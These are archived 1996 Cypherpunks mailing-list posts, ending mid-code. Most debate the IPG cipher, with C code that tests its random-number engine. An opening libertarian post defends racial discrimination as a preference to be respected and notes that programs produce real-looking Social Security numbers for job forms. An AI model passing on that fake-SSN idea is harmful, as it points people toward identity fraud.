>My question was a real one.  The basis of it comes from my work with
>the homeless in which they have a difficult time getting a job
>because they have no "home address" to put on the forms, some do not
>have or remember their SSNs, etc.  This causes a cyclic problem for
>the homeless.  My question to Tim was, in the real world, how is the
>protection of this data feasible.

The way you protect your home address is by using another address for
work which is not your home.  The way I would do this is to find a
mail box service which offers addresses that look like a home.

A homeless person might find somebody with a home (like you) who will
receive their work related mail for them.

A "phone" is easy to get, too.  You can get a telephone number which
is linked to a voicemail box.  You can even get this number listed in
the telephone book, if you like.  The cost of this service should be
less than twenty dollars a month.  If you want to go wild, you can get
a pager linked voicemail number.  This means your pager goes off when
you get a message.  Handy.

But, even this small expense may be out of reach of a homeless person
or a homeless advocate.  What you can do is get a second line for your
home and keep it unlisted.  Then, give it to your homeless friends for
work related purposes.  If the number is only used for work messages,
you could probably handle over a hundred people on this one line.

As for the social security number, it has been claimed many times on
this list that nobody checks them anyway.  There are programs which
generate real-appearing numbers.  (I think one was called "ssn.exe".)

And, you can go to the SSA to find out somebody's SS number or to have
one issued.  It will take awhile.

>I do have responses to each of your "points" in your last post, but have
>found the process of responding point-by-point tedious and non-productive
>(maybe less productive than the time I have to give to the exercise, I was
>not intending on placing a value judgement on it).

This gives the appearance that you are avoiding the points I raised.
My conclusion is that your views are indefensible.  Having described
my views on the poor as "idiotic", I think it is in poor taste to
withdraw from the field without justifying your claim.

>As the topic quickly wandered from the original post on privacy
>concerns to racial discrimination, I will address that.  I apologize
>to the list (for those that find it irrelevant), but I can not reply
>directly to Red.

Cryptoanarchy is not friendly to schemes to prohibit racial
discrimination.  Indeed, it is unfriendly to any scheme which attempts
to control the relationships between people.

>I, personally, find racial discrimination to be a problem in the USA.

It would be nice if everybody in the U.S. was not a racist.  It would
be nice if all the bad people just left.

>Not only do I find it a moral problem, but it has adverse effects on
>markets and the efficiency of these same markets.  It is costly not
>only in personal measures, but in economical terms as well.

But, of course, I don't subscribe to the notion that market efficiency
is the best means of determining policy.  For one thing, concepts such
as efficiency and production are politically defined.  If I grow food
for myself, it does not affect GDP figures.  If I trade the food for
money and buy something, then the same production increases GDP.  This
is not sensible.

More importantly, I don't believe that market efficiency, however
measured, is sufficient justification for dictating other people's
actions.  "Market efficiency" is a gambit to conceal dictatorial
powers in a scientific cloak.

Discussions of market efficiency typically overrule the preference
that citizens have.  One could imagine that a study that concluded
alcohol consumption reduced national efficiency and should therefore
be banned.  Yet, this completely fails to take into account the strong
preference many people have to drink.  Some even consider it to be a
religious sacrament.  I don't believe such preferences should be
ignored.  They should be respected.

Likewise, if somebody just cannot stand Albanians, we should respect
their preference even though we may personally disagree with it and
even though we may believe it makes the annual GDP number lower.

I am not sure exactly what "costly ... in personal measures" means.
If you mean that somebody who will not speak with Albanians is
deprived of rewarding friendships they might otherwise have, that is
probably true.  On the other hand, the Albanian-hater will not see it
that way.  That is his or her tough luck.

>I do expect many on the list to disagree with me....They will
>disagree that it affects markets in any way.

Just for the record, I can imagine that racial prejudice could have a
slight effect on mortgage prices (i.e, interest).  But, since the CMO
revolution, I am inclined to believe that effect will be quite small
and is probably unnoticeable.

>They will assert that legislative restrictions are far worse than
>industry self-policing.

Just for the record, I am not advocating "industry self-policing".
Policing is what I disagree with.

>More will disagree that the government has any business regulating
>the area.  As I had stated simply before, I disagree.

All you have really said is "I believe X."  Should we take your belief
on faith or are there reasons which underly your beliefs?

>Thru painful learning experiences and reality checks - long arguments
>over several months and too much coffee - I decided that I would not
>want to live in a libertarian's ideal society.  This decision was
>based on my perception that it just wouldnt work in reality.

>>I'm sure many readers of this list have had conversations which
>>abruptly end with "Are you a Libertarian?", which is generally
>>completely irrelevant to the point under discussion.  What is
>>happening is that the other person is more interested in knowing your
>>tribal identification than what you believe.  A pity.
>
>As strange as it may sound to you, most of my conversations go this
>way.  It is ironic to me that I have been placed on this side of an
>argument.

Yet, you are doing something very similar when you raise the issue of
"a libertarian's ideal society".  Likewise, you criticized Tim May for
having (roughly) "too absolute a theory".  In either case, you are
avoiding substantive discussion, preferring to make prejudicial
remarks.

Here we are discussing some very specific policies and their ethical
implications.  There is no need to raise the specter of the
"libertarian ideal society".  One nice thing about Libertarian-style
discussions is that most of the policies are separable; that is, we
can discuss redlining without discussing highway privatization.  This
makes a nice contrast to other styles of discussion in which the
proposed scheme only works if everybody participates.  The most
extreme example was Marxism where it was claimed that it would fail if
the entire world was not Marxist.

>Do you tend to think of me now as "less of a Libertarian" much as
>your forewarned "In the House" black reference?

"In the house"?  This appears to be an American idiom which I haven't
learned yet.

I used the word "forewarned" once.  I said that it would be hard to
believe that even wealthy African-Americans were racist in their
lending practices.  I still find it hard to believe.

It may surprise you to know that I am not all the interested in
whether you call yourself a Libertarian.

>>Do we then believe that we should outlaw the actions they take based
>>on these beliefs?  So long as the people in question are doing no
>>harm, I propose we leave them alone to live their lives.
>
>This is the essence of, at least, my disagreement with you Red.  I
>dont agree that redlining doesnt harm people.  You see no harm.  I
>do.

Your reluctance to discuss the nature of the harm you perceive does
not give the impression that you have good reasons for your
perception.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 10 Dec 1996 18:21:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Are accountants smart or stupid?
Message-ID: <199612110221.DAA25419@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


xx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 01:30:14 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Ignoramus Chewed-Off on IPG algorithm
In-Reply-To: <199611301953.NAA14436@manifold.algebra.com>
Message-ID: <Pine.BSI.3.95.961211030715.11832F-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 30 Nov 1996, Igor Chudov @ home wrote:

> Igor Chudov @ home wrote:
> > 
> > Let's go on, to the description of the "scrambling tables" and 
> > actual encryption.
> > 
> > He uses three tables, DIFF, DISP, DETR, each containing 4096 elements.
> > DISP is randomly generated (or so I understand his term "prescrambled"),
> > DIFF is a random transposition of DISP (same values as in DISP, but in
> > another order), and DETR, again, is filled with some random data.
> > 
> 
> Correction: by "scrambling" Don means transposing elements of the 
> table containing 4096 numbers 1-4096.

Yes, but using the algorithms set out at the web site and our own
8192
byte keys, using the timing of keystrokes. Thus, we have randomized
them, in a manner similar, but far more complex,  to what Dr. Rivest did
in his systems, and what I have done previously at NSA. 
 > 
Only the DIFF and DISP tables are random transpositions of the numbers 0
- 4095, the DETR table is a random transposition of 16 sets of the numbers
0 - 255, the ASCII values.

> 
	- Igor.
> 
Yes, but if you read the web site, you will find that those are only the
initial values. The user generated key, the most important element, and  
the time and the message number, both of which are transmitted, are used
to further randomize the three tables.

Also, an user can customize their own initial values so that they are
unlike any other set of values.

In these respects, the technique is similar to aspects RC4/RC5, except far
more complex, three tables instead of 1, and 4096 values instead of 256. I
might add that the table lookup techniques are in effect similar to
prime number cipher wheel systems employed by NSA over the years for very
secure encryption systems, except that instead of the clear text providing
an additional variable, CFB, the PRNG stream, the ABC equations, does
that.

Again, the best way to analyze the system is to get a copy and analyze the
results using your own keys. As indicated, we even provide a test
version where you can look at all the intermediate tables, the As, Bs, and
Cs actually used and everything.

With kindest regards,

Don Wood
  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 01:41:23 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: IPG algorithim
In-Reply-To: <199611302150.PAA15126@manifold.algebra.com>
Message-ID: <Pine.BSI.3.95.961211033046.11832G-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




Igor, Eric,

As I have noted to Eric, I appreciate that at least both of you are trying
to understand and implement the algorithm. My comments follow:

On Sat, 30 Nov 1996, Igor Chudov @ home wrote:

> [This is an addition to my previous reply to Eric]
> 
> It bugs me that you are using rand() (a fairly lame pseudo-random
> function that was never intended to be used in cryptographic
> applications) to seed A, B, C and JV and then test the A(JV) for
> randomness. Some may object to that. Just for fun, I am attaching a hex
> dump of output from my /dev/random (Linux 2.0.24). You could simply take
> these truly random values and put them in initial A, B, C and JV, just
> to be sure.
> 
> I doubt though that your results (poor randomness of A(JV)) will be
> any different.


I agree, and as I have indicated elsewhere, either the B or the C is
is a prime number. The numbers in A, B, and C are not random numbers,
they are only selected randomly in a manner almost identical to a LOTTO 
selections, except that the pools are much larger and the order is
very significant.

There are so many things that are wrong with the Murray
implementation that it would be takes days to clarify it. It is simply not
the algorithm, nor even any significant part of it. The actual As, Bs and
Cs are specified at the Web ,site as is the algorithm for using the Key to
select the ones actually used. In the example, 53 of 512 As, 53 of 600
plus Bs, and 53 of some 500 plus Cs.


> 
> igor
> 
> 0000000 c76d 74ac b253 ffc3 ae97 e092 629c 7a53
> 0000010 087a 21e6 8c2c 0ab6 a03a ea3c 0c71 a748
> 0000020 68f0 540d a4f2 0a2b b62b 4ab6 ddaa d3e4
> 0000030 a795 51f3 7dff 067d 2f6b 8d18 fa23 0200
> 0000040 99df 1d97 e232 b8d5 381f cf1e 7ea8 d971
> 0000050 8aa0 df0b cf41 53e2 a9f5 5304 dc28 c242
> 0000060 c01b 5990 75a1 688d 497f cc54 d336 217e
> 0000070 7dd7 4800 09d4 ff5b 53b8 6308 d38f 60f5
> 0000080 513a 3ea7 90f6 4cdf e783 6a14 145a e2b1
> 0000090 2041 6bb5 f417 6109 6101 fecd b7f1 7287
> 00000a0 f31a 6cb4 d559 ed7c 1be8 e0ca 21f9 8779
> 00000b0 701e bbcc 8909 7743 bfef c5ef 0f60 cd6a
> 00000c0 565b 30b5 e710 5f66 aa83 0751 5bc7 867e
> 00000d0 87a8 8511 9969 d101 c1bb 871b a2e5 f579
> 00000e0 5e14 9167 480a 9fc2 8354 5769 4ee0 7765
> 00000f0 faf5 c29f 25ad 77ea 9ecf 39b4 2d11 969f
> 0000100 099c f85a 7240 9922 0513 d607 41ea ba29
> 0000110 1886 2611 e577 50c6 87af 393a 782a 6666
> 0000120 9ae0 221e ec58 ce2e de77 b6de 5821 82e9
> 0000130 db17 5027 7e57 567a 2e82 f056 01d0 2cde
> 0000140 0314 ac33 78bd d569 215e b8d7 6a3b 0caa
> 0000150 b44f 8c6c 04de 4cf2 e111 2803 a073 7d27
> 0000160 f78c 9d28 70ca 1cd4 ce53 5dea 3141 efa9
> 0000170 8246 c7ee 4ed3 e49a 8d97 8ded d818 327a
> 0000180 f999 e044 ff28 ffe9 0254 535c 7e70 a09c
> 0000190 af58 bcd2 07b0 8146 f4cc 7568 751c c6ee
> 00001a0 b6b7 be3f d870 84ce 7f8c 3ec4 1427 09fc
> 00001b0 706e 93f8 9752 230b 74cd 0b0b 38be ba5b
> 00001c0 a9a6 062a cdee f11d d367 37e2 ec4f 90e4
> 00001d0 9019 d9ff 2ff9 fb5d 559b 4dd0 2ab0 7e35
> 00001e0 184a 3e90 f072 7349 007f 5d41 c176 8d8a
> 00001f0 a30c 1a68 eca6 63f4 256f 88e1 2cec dc1a
> 0000200 a0ac 90f0 b515 2fbc 2778 4e66 2323 7528
> 0000210 59c3 c3a9 3ccd e29d 315a fa6a 7821 f6e4
> 0000220 7977 5e9f df6c f87e 5d15 5693 3da8 9790
> 0000230 faaf d028 0c05 f5f0 160a 8cb7 f726 18cf
> 0000240 796d 77c5 3c2e 5ddb f770 7183 3c17 81b7
> 0000250 b0ff ad01 a4d3 26a1 7821 d210 376a 8283
> 0000260 3860 61a9 c509 e34c 46a4 7f70 b2ff 18db
> 0000270 24ad 97b5 e474 eee2 9036 c125 3fdb 88ce
> 0000280 824a 3096 98fc 0b9f 2f3a 6ac3 25e1 8d08
> 0000290 46c6 7218 ea87 3c6d 6395 6fc5 34b0 1447
> 00002a0 ddb3 b3af fdbf b545 5f47 0fe6 bfd0 e799
> 00002b0 99f6 1fc6 c70b 524f 717f a25d 9f08 f78a
> 00002c0 e230 b4b9 2045 5652 9677 5ce3 a827 9e8f
> 00002d0 261f 4650 c731 afbb e257 8410 621a 09aa
> 00002e0 d991 7a3b bb68 4995 fd15 2afc 8e26 842b
> 00002f0 cdf7 2d13 4055 9d22 be44 aa16 ed06 db8a
> 0000300 4210 714b 330d 6c9e 3f81 c993 4d8b 2f6b
> 0000310 134f 1566 8170 9cc6 4cff d188 78c4 29ae
> 0000320 27ec 731f 391c 6241 ffaf 2967 8756 1517
> 0000330 5d1a e807 c477 7757 bd6a ff4c 1cf1 01ce
> 0000340 dfa7 25b4 5a4f 9cf0 e96e 2d69 0de0 c24e
> 0000350 0a2c 9ec8 112d 0851 c028 917b b00b f9a0
> 0000360 0b07 b9f0 c4ef 4426 1cce c8c8 7186 8c24
> 0000370 9868 fe68 9136 1316 1e58 e883 5aa9 1298
> 0000380 c0ed eaa4 aaa2 7f23 48d1 5056 8837 06ec
> 0000390 5f69 ce3a 3d5b 1e7a 7545 e237 352d d887
> 00003a0 df9c 734d a441 7fa5 6685 eff0 4ce8 1876
> 00003b0 f9c9 2e18 f825 3a3a a6b8 e0cc 5d49 136a
> 00003c0 853d dd88 c0f8 befc 8b87 e261 fd73 09af
> 00003d0 b392 3afa f38e 6a25 cc5d b624 1012 49f3
> 00003e0 31b0 196c aa02 b3f2 454a 7817 2198 5ad7
> 00003f0 84c5 f22d 8b6e cdc9 12c3 d0b5 b866 9976
> 0000400 97a7 3b5e dedf 201d 50f5 99a6 bf54 04ab
> 0000410 a34e 3a66 538c 51a0 c00b 7ae8 f2ae 6343
> 0000420 c5f1 1ef1 1f8f 7415 5b50 53a4 33ad d046
> 0000430 13b6 62a2 cc34 feee 7fda 671a 2b28 a36c
> 0000440 a806 15be 1ccc b5b9 ef85 04ca 168c 8cd0
> 0000450 c44e d117 a6c8 cbaf 3b5b 581c d94a 8469
> 0000460 effb 0f18 cd45 5c77 6ab1 1289 e385 9771
> 0000470 199f 5610 8095 be8b e257 2ef8 a221 99ee
> 0000480 1d8b c81c 9781 e803 e4ab 4afb 5669 efb1
> 0000490 b31f 36e2 5930 b838 e84c 4f6e a709 0c40
> 00004a0 fefe c530 4ee2 ee3a aa2e e278 de99 8b1e
> 00004b0 4e83 c98a 47cd 4715 081d 7c7d 5f6f 657c
> 00004c0 49b5 70c0 937a d4c2 39ff d282 8768 1d7c
> 00004d0 40fe 1ed1 59b9 d0f7 b4cc 55b3 5da2 4118
> 00004e0 14dc 4b71 202a fb96 0bed 6d2a 03d6 2f2d
> 00004f0 9056 8d84 8b6e 948b 4b89 efd1 53ba 9a13
> 0000500 ea01 770a dc40 fcad bf69 cf60 7884 3f66
> 0000510 b057 2e82 3745 2839 f68d f637 ad95 5463
> 0000520 ff3c 353d 08b2 44c2 72bb b25b f60d 0dbf
> 0000530 455a e9b4 8bbf 3307 071a f720 f00e 0217
> 0000540 f8cc f7cc 2cc4 ef14 e6b6 7dbc ceff 2dea
> 0000550 fc34 ed72 d59b 8cd2 794c 2d11 e470 ba44
> 0000560 bff3 c531 b38b 5398 4a46 63be d86b ae19
> 0000570 d6a4 2e8d da0d 0ff9 a3db 2cc4 0494 72b1
> 0000580 b871 1f7e b8da a2f0 2f63 b522 3212 43da
> 0000590 f910 374e b1f5 5462 8db0 65ef 5e5b 9bf1
> 00005a0 9337 5003 31fc 47a9 8c06 d0d8 c8ab 8732
> 00005b0 ff5e 7fe3 b43c 9ba0 14dd f31f cf4c a5b5
> 00005c0 5552 b1ee 0ee6 a38f dc2b 32ac ab80 e12d
> 00005d0 be8c ad7d 89e9 5cda 0781 f30c b1d1 3163
> 00005e0 72f9 bcbe 5972 1862 3a15 660f 4227 b168
> 00005f0 280d 35fa 1765 46f3 468b 0538 44fc 216e
> 0000600 30f6 8340 6805 7f5c a280 fcdf 563d 9751
> 0000610 50c9 fb04 065c 12ec 9ce3 34ee 2a3d f821
> 0000620 d43e b64e 067f fd26 5e94 b7d1 9b28 fbcf
> 0000630 811b 4631 6018 5385 1297 e37a b0ea c6fd
> 
> Eric Murray wrote:
> > 
> > 
> > 
> > I have translated the IPG algorithim's "engine" to C, to generate
> > some random values from it for testing purposes.  It does not
> > look very random in either the xnoisesph program or the DIEHARD
> > test battery.   However I may well have misinterprested Mr. Wood's
> > description (his writing is, as Mr. Chudov points out, difficult to
> > understand) or written my code incorrectly.  Here it is, play
> > with it yourself.  To my untrained eye the lack of randomness
> > in what's essentially a stream cipher would be disturbing.
> > However I am not a cryptoanalysist so I do not know to
> > what extent this weakens the cipher.
> > 
> > 
> > The IPG description does not say (but implies to me) that
> > the various tables that are to be filled in by "random" values must
> > be filled in by PRNGs that are seeded with the same seeds by
> > each of the party that knows the key.  Otherwise the "encryptor
> > streams" that are generated will be unrelated and decryption will not
> > be possible.  To make my test work I have used the simple rand()
> > function to fill in the tables.
> > 
> > 
> > Corrections are welcome.
> > 
> > 
> > 
> > #include <stdio.h>
> > 
> > /* a C translation of the IPG "EUREKA" algorithim's "engine".
> > ** This is supposed to produce random numbers for the IPG
> > ** "encryptor stream".
> > ** See http://www.netprivacy.com/ for the original description.
> > ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft.  */
> > 
> > /* machine-dependent stuff, change to suit different platforms: */
> > typedef unsigned char byte;
> > typedef unsigned short uint16;
> > 
> > 
> > /* tables: */
> > uint16 A[53];
> > uint16 B[53];
> > uint16 C[53];
> > 
> > 
> > int init_table(uint16*table, uint16 min, uint16 max)
> > {
> > 	/* IPG specifies no algorithim for producing the "random"
> > 	** initial values in the ABC tables, but it's obvious that
> > 	** it requires a PRNG that's somehow seeded from the "key".
> > 	** I've just used rand() here.  In UNIX rand() called with no
> > 	** seed is supposed to seed itself with 0. */
> > 	int i;
> > 	int count, r;
> > 
> > 	for(i = 0; i < 53; i++) {
> > 		table[i] = min + (rand() % (max - min));
> > 	}
> > }
> > 
> > main(int argc, char **argv)
> > {
> > 	uint16 jv;
> > 	int argcnt, i, n, count, diehard, nelem;
> > 
> > 	diehard = 0;
> > 	argcnt = 1;
> > 	if (argc >= 2) {
> > 		if (strncmp(argv[argcnt],"-d") == 0) {
> > 			diehard++;
> > 			argcnt++;
> > 		}
> > 	}
> > 	if (argc > argcnt - 1 ) {
> > 		n = atoi(argv[argcnt]);
> > 		fprintf(stderr,"Generating %d values\n",n);
> > 	}
> > 	else {
> > 		n = 2000;
> > 	}
> > 
> > 	/* seed tables: */
> > 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> > 	init_table(A,0,65535);
> > 	fprintf(stderr," B");  fflush(stderr);
> > 	init_table(B,0,12227);
> > 	fprintf(stderr," C");  fflush(stderr);
> > 	init_table(C,16384,20361);
> > 	fprintf(stderr,"\n");  fflush(stderr);
> > 
> > 	/* generate n values: */
> > 	for(; n > 0; n--) {
> > 		/* jv is "random" (where's it seeded from?) */
> > 		jv = (uint16)(rand() % 53);
> > 
> > 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> > 		for(count = 0; count < 2809; count++) {
> > 			jv++;
> > 			if (jv == 53) jv = 0;
> > 			A[jv] = (A[jv] + B[jv]) % C[jv];
> > 			if (A[jv] < 16384) break;
> > 		}
> > 		if (count == 2809) fprintf(stderr,"Oops.\n");
> > 		else {
> > 			if (!diehard) {
> > 				printf("%d\n",A[jv]);
> > 			}
> > 			else {
> > 				/* print output in DIEHARD required format:
> > 				** actually since we have 16-bit ints and DIEHARD
> > 				** wants 32-bit ints, we print 20 per line instead of 10 */
> > 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> > 				printf("%4.4x",(unsigned int)A[jv]);
> > 			}
> > 		}
> > 	}
> > }
> > 
> > 
> > 
> > -- 
> 
> 
> 
> 	- Igor.
> 

With Kindest Regards,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 01:47:11 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: IPG algorithim
In-Reply-To: <199611302127.PAA14989@manifold.algebra.com>
Message-ID: <Pine.BSI.3.95.961211034239.11832H-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 30 Nov 1996, Igor Chudov @ home wrote:

> Eric Murray wrote:
> > 
> > 
> > 
> > I have translated the IPG algorithim's "engine" to C, to generate
> > some random values from it for testing purposes.  It does not
> > look very random in either the xnoisesph program or the DIEHARD
> > test battery.   However I may well have misinterprested Mr. Wood's
> > description (his writing is, as Mr. Chudov points out, difficult to
> > understand) or written my code incorrectly.  Here it is, play
> > with it yourself.  To my untrained eye the lack of randomness
> > in what's essentially a stream cipher would be disturbing.
> > However I am not a cryptoanalysist so I do not know to
> > what extent this weakens the cipher.
> 
> Thanks for an interestnig approach to testing (see below).
> 
> > The IPG description does not say (but implies to me) that
> > the various tables that are to be filled in by "random" values must
> > be filled in by PRNGs that are seeded with the same seeds by
> > each of the party that knows the key.  Otherwise the "encryptor
> > streams" that are generated will be unrelated and decryption will not
> > be possible.  To make my test work I have used the simple rand()
> > function to fill in the tables.
> 
> A good point.
> 
> > Corrections are welcome.
> 
> see below.
>  
> > 
> > #include <stdio.h>
> > 
> > /* a C translation of the IPG "EUREKA" algorithim's "engine".
> > ** This is supposed to produce random numbers for the IPG
> > ** "encryptor stream".
> > ** See http://www.netprivacy.com/ for the original description.
> > ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft.  */
> > 
> > /* machine-dependent stuff, change to suit different platforms: */
> > typedef unsigned char byte;
> > typedef unsigned short uint16;
> > 
> > 
> > /* tables: */
> > uint16 A[53];
> > uint16 B[53];
> > uint16 C[53];
> > 
> > 
> > int init_table(uint16*table, uint16 min, uint16 max)
> > {
> > 	/* IPG specifies no algorithim for producing the "random"
> > 	** initial values in the ABC tables, but it's obvious that
> > 	** it requires a PRNG that's somehow seeded from the "key".
> > 	** I've just used rand() here.  In UNIX rand() called with no
> > 	** seed is supposed to seed itself with 0. */
> > 	int i;
> > 	int count, r;
> > 
> > 	for(i = 0; i < 53; i++) {
> > 		table[i] = min + (rand() % (max - min));
> > 	}
> > }
> > 
> > main(int argc, char **argv)
> > {
> > 	uint16 jv;
> > 	int argcnt, i, n, count, diehard, nelem;
> > 
> > 	diehard = 0;
> > 	argcnt = 1;
> 
> how about doing randomize()?
> 
> > 	if (argc >= 2) {
> > 		if (strncmp(argv[argcnt],"-d") == 0) {
> > 			diehard++;
> > 			argcnt++;
> > 		}
> > 	}
> > 	if (argc > argcnt - 1 ) {
> > 		n = atoi(argv[argcnt]);
> > 		fprintf(stderr,"Generating %d values\n",n);
> > 	}
> > 	else {
> > 		n = 2000;
> > 	}
> > 
> > 	/* seed tables: */
> > 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> > 	init_table(A,0,65535);
> > 	fprintf(stderr," B");  fflush(stderr);
> > 	init_table(B,0,12227);
> > 	fprintf(stderr," C");  fflush(stderr);
> > 	init_table(C,16384,20361);
> > 	fprintf(stderr,"\n");  fflush(stderr);
> > 
> > 	/* generate n values: */
> > 	for(; n > 0; n--) {
> > 		/* jv is "random" (where's it seeded from?) */
> > 		jv = (uint16)(rand() % 53);
> > 
> > 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> > 		for(count = 0; count < 2809; count++) {
> 
> 2809 is a too small limit. For example, if ALL B == 1, A == 16385, and 
> C == 20361, the loop may need (20361-16385) passes to get to the < 16384
> value.
> 
> Again, if all A = 16385, all B = 0, all C = 16386, the loop will never 
> end with a correct A (your code reflects that).
> 
> > 			jv++;
> > 			if (jv == 53) jv = 0;
> > 			A[jv] = (A[jv] + B[jv]) % C[jv];
> > 			if (A[jv] < 16384) break;
> > 		}
> > 		if (count == 2809) fprintf(stderr,"Oops.\n");
> > 		else {
> > 			if (!diehard) {
> > 				printf("%d\n",A[jv]);
> > 			}
> > 			else {
> > 				/* print output in DIEHARD required format:
> > 				** actually since we have 16-bit ints and DIEHARD
> > 				** wants 32-bit ints, we print 20 per line instead of 10 */
> > 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> > 				printf("%4.4x",(unsigned int)A[jv]);
> > 			}
> > 		}
> > 	}
> > }
> > 
> > 
> 
> You are also bringing a good point that Chi-squared tests are not
> sufficient to make any conclusions about usefulness of this particular
> pseudo random number generator.
> 
> 	- Igor.
> 
Chi Squares alone are not sufficient but we are only talking about the
seed algorithm, and at our web sites, you will find Standard Deviations,
Chi Squares, Delta ICs, autocorrelations, cross correlations, and a
variety of other tests done on single characters, couplets - pairs,
first differences, second differences, offset differences and all kinds of
other tests. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mf@MediaFilter.org (MediaFilter)
Date: Wed, 11 Dec 1996 02:49:45 -0800 (PST)
To: eon@black.hole
Subject: black.hole in the net
Message-ID: <1361846569-1146094@MediaFilter.org>
MIME-Version: 1.0
Content-Type: text/plain


Call For Projects:

____________________the black.hole in the net is open.

____________________please go to:

____________________http://black.hole.
or
____________________http://blackhole.autono.net.

for name.space. networks, go directly to
____________________http://project.black.hole.

to add your link (name.space. url's only!).

and

____________________http://switchboard.black.hole.

This project is based on "soft home" or "multi-homing"
on web servers with the use of only one ip number.

any number of names can be mapped to a single ip number.

the server delivers the web page associated with the name
that the server answers to, i.e.

http://black.hole               returns the black.hole page
http://switchboard.black.hole   returns the black.hole link page
http://project.black.hole       returns the black.hole link generator page

The black.hole is an example of content-routing possible
with the name.space naming system.

Best regards,

Paul Garrin
mf@mediafilter.org

please forward this message.


http://name.space.
http://namespace.autono.net.



for more info on name.space, visit the site, or hear the
confrontation over it on hotwired's hotseat
(this is not an ad or endorsement for wired!)

http://www.packet.com/hotseat
(in realaudio)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 01:51:04 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: IPG algorithim
In-Reply-To: <32A0EE99.1023@gte.net>
Message-ID: <Pine.BSI.3.95.961211034810.11832I-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 30 Nov 1996, Dale Thorn wrote:

> Eric Murray wrote:
> > I have translated the IPG algorithim's "engine" to C, to generate
> 
> [snippo]
> 
> Now that's what I call amazing.  Maybe I could rewrite PGP
> tomorrow (hee hee).
> 
> 
More than amazing, it is all screwed up to. Random As, Bs, and Cs which
granted would never work, no 3 dimensional lookup tables and kinds of
other problems too.

But at least he and Igor are trying, and you to a degree too.

Thanks,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 01:54:03 -0800 (PST)
To: Eric Murray <ericm@lne.com>
Subject: Re: IPG algorithim
In-Reply-To: <199612010021.QAA14426@slack.lne.com>
Message-ID: <Pine.BSI.3.95.961211035154.11832J-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




Everything is still screwed up. The As, Bs and Cs are selected in much the
same fashion as LOTTO numbers except that the pools are much larger and
order is significant. They are not random, that would never work.



On Sat, 30 Nov 1996, Eric Murray wrote:

> 
> Igor Chudov @ home writes:
> > 
> > [This is an addition to my previous reply to Eric]
> > 
> > It bugs me that you are using rand() (a fairly lame pseudo-random
> > function that was never intended to be used in cryptographic
> > applications) to seed A, B, C and JV and then test the A(JV) for
> > randomness. Some may object to that.
> 
> Yea, you're right, rand() is lame.
> 
> I added /dev/random to my Linux box and changed my small test to use it.
> I also changed the way that I use JV- I had been setting it to a random
> value for each trip through the "engine", but since I beleive that
> its value can't really be random (if you want to be able to have someone
> decrypt your stuff :-) but must be exchanged in the key, I set it
> to a random value once and then let it float.  It's also a lot faster
> that way, /dev/random is pretty slow (because it's looking for real
> random material).
> 
> My results from xnoisesph were wrong- xnoisesph wants random bytes
> instead of random integers in ascii format as I was producing.
> Changing it (as I have below) makes the xnoisesph output look
> much better, but it still isn't all that random.  The random seed generators
> I have written that get their randomness from repeated calls
> to high-resolution timers and hashes of system log files do better.
> I also fixed a minor bug in arg processing.
> 
> 
> 
> 
> 
> 
> #include <stdio.h>
> #include <fcntl.h>
> 
> /* a C translation of the IPG "EUREKA" algorithim's "engine".
> ** This is supposed to produce random numbers for the IPG
> ** "encryptor stream".
> ** See http://www.netprivacy.com/ for the original description.
> ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft. 
> ** V0.2 */
> 
> typedef unsigned char byte;
> typedef unsigned short uint16;
> 
> 
> /* tables: */
> uint16 A[53];
> uint16 B[53];
> uint16 C[53];
> 
> 
> #ifndef NO_DEV_RANDOM
> uint16 getrand()
> {
> 	uint16 ret;
> 	int fd = open("/dev/random",O_RDONLY);
> 	if (fd <= 0) {
> 		perror("/dev/random"); exit(-1);
> 	}
> 	read(fd,(unsigned char *)(&ret),sizeof(ret));
> 	close(fd);
> 	return(ret);
> }
> #else
> /* do something appropriate for your OS here, rand() is lame. */
> #define getrand rand
> #endif
> 
> 
> int init_table(uint16*table, uint16 min, uint16 max)
> {
> 	/* IPG specifies no algorithim for producing the "random"
> 	** initial values in the ABC tables, but it's obvious that
> 	** it requires a PRNG that's somehow seeded from the "key".
> 	** I've used /dev/random here, so there's no question that
> 	** I'm starting out with pretty good random values. */
> 	int i;
> 	int count, r;
> 
> 	for(i = 0; i < 53; i++) {
> 		table[i] = min + (getrand() % (max - min));
> 	}
> }
> 
> main(int argc, char **argv)
> {
> 	uint16 jv;
> 	int argcnt, i, n, count, diehard, nelem;
> 
> 	diehard = 0;
> 	argcnt = 1;
> 	if (argc >= 2) {
> 		if (strncmp(argv[argcnt],"-d",2) == 0) {
> 			diehard++;
